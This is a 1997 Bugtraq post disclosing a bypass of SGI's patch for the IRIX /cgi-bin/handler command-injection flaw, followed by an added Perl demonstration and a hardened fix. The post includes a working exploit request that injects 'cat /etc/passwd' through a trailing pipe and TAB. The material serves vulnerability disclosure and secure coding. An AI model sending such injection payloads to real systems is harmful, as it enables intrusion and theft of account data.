Bugtraq mailing list archives
/cgi-bin/handler - more notes
From: drazvan () kappa ro (Razvan Dragomirescu)
Date: Thu, 19 Jun 1997 23:06:13 +0300
Hi,

I have had reports that my exploit for SGI's /cgi-bin/handler does not work on IRIX 6.3 (on O2). I analyzed the code provided with IRIX 6.3 and they tried to fix it, but they actually DID NOT. They added a new line to the script:

    $doc=~s/\|*$//

(in plain English, this means "remove any number of '|'s at end-of-string"). But guess what. It works just as fine if you put another TAB character after the "pipe" (so that the "pipe" is not at end-of-string, the TAB is). The exploit should read:

    telnet target.machine.com 80
    GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download HTTP/1.0

It tricks the script into executing the command anyway.

Now, for those of you who want to patch it somehow, here's the best solution that has been posted to me (all credits for it go to Wolfram Schneider <wosch () apfel de>):

All "open" commands should check if their argument is really a filename. You could use:

    -f $doc && open (INPUT, $doc)

(Same thing as:

    if (-f $doc) { open (INPUT, $doc) }

but the one written above is more PERL style.)

I'm waiting to hear from you (my thanks to Lamont Grandquist who pointed out the problem on IRIX 6.3). So far, IRIX versions 5.3, 6.2, and now 6.3 are vulnerable. Anyone on IRIX 6.4? :) (What does it run on BTW?)

Be good.
Razvan

-------------------------------------------------------------------------------
Razvan Dragomirescu
Organization: KappaNet
E-Mail: drazvan () kappa ro, drazvan () romania ro
Alternate E-mail: drazvan () iname com, drazvan () guv ro, drazvan () pub ro, drazvan () lbi ro
Phone: +40-1-6866621
NIC-HANDLE: RD1604
RIPE-HANDLE: RD38-RIPE
NO CARRIER
"Smile, tomorrow will be worse" (Murphy)
-------------------------------------------------------------------------------
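The following is an added example, not code from the post or from SGI's handler script. It reproduces locally, with a harmless `echo` instead of `cat /etc/passwd`, the three things the message describes: the two-argument `open()` that treats a trailing `|` as "run this command", the IRIX 6.3 regex fix `s/\|*$//`, and why a trailing TAB defeats it. The function names (`strip_trailing_pipes`, `read_doc_unsafe`, `read_doc_safe`) are this example's own; the hardened version applies the `-f` check suggested in the post and additionally uses the three-argument form of `open`, which never interprets its filename argument as a command.

```perl
#!/usr/bin/perl
# Added example (not from the original post or the IRIX handler script).
use strict;
use warnings;

# The IRIX 6.3 "fix" quoted in the post: strip any run of '|' at end-of-string.
sub strip_trailing_pipes {
    my ($doc) = @_;
    $doc =~ s/\|*$//;
    return $doc;
}

# Vulnerable pattern. Two-argument open() is "magic": a name ending in '|'
# means "run this as a shell command and read its output". Two-argument
# open() also trims leading and trailing whitespace from the name BEFORE
# looking for that '|', so "cmd|<TAB>" survives the regex above and is
# still executed as "cmd|".
sub read_doc_unsafe {
    my ($doc) = @_;
    $doc = strip_trailing_pipes($doc);
    open(my $in, $doc) or return undef;    # 2-arg open: command if it ends in '|'
    local $/;                              # slurp
    my $data = <$in>;
    close($in);
    return $data;
}

# Hardened pattern: the -f check from the post (argument must be an existing
# regular file), plus three-argument open() with an explicit '<' mode so the
# name is only ever a path, never a pipe or command.
sub read_doc_safe {
    my ($doc) = @_;
    return undef unless -f $doc;
    open(my $in, '<', $doc) or return undef;
    local $/;
    my $data = <$in>;
    close($in);
    return $data;
}

# Constructed inputs: a harmless command standing in for "cat /etc/passwd".
my %cases = (
    'pipe at end-of-string'     => "echo pwned|",
    'pipe followed by TAB'      => "echo pwned|\t",
);

for my $label (sort keys %cases) {
    my $doc = $cases{$label};
    my $unsafe = read_doc_unsafe($doc);
    my $safe   = read_doc_safe($doc);
    printf "%-24s unsafe: %s\n", $label, defined $unsafe ? "EXECUTED -> $unsafe" : "open failed (regex fix held)\n";
    printf "%-24s safe:   %s\n", $label, defined $safe   ? "read file"             : "rejected by -f\n";
}
# Expected behaviour: "echo pwned|" loses its pipe to the regex and open()
# fails on a nonexistent file named "echo pwned"; "echo pwned|\t" keeps its
# pipe, open() trims the TAB and runs the command, printing "pwned".
# read_doc_safe() rejects both because neither is an existing regular file.
```

Two caveats when applying the `-f` fix to a real script: `-f` stops command execution but not arbitrary file disclosure, since `../../etc/passwd` is still a regular file, so the path should also be confined to the document directory; and the check and the open are two separate system calls, so the three-argument `open` (or `sysopen`) is what actually guarantees the argument is never treated as a command, regardless of what the filename test saw.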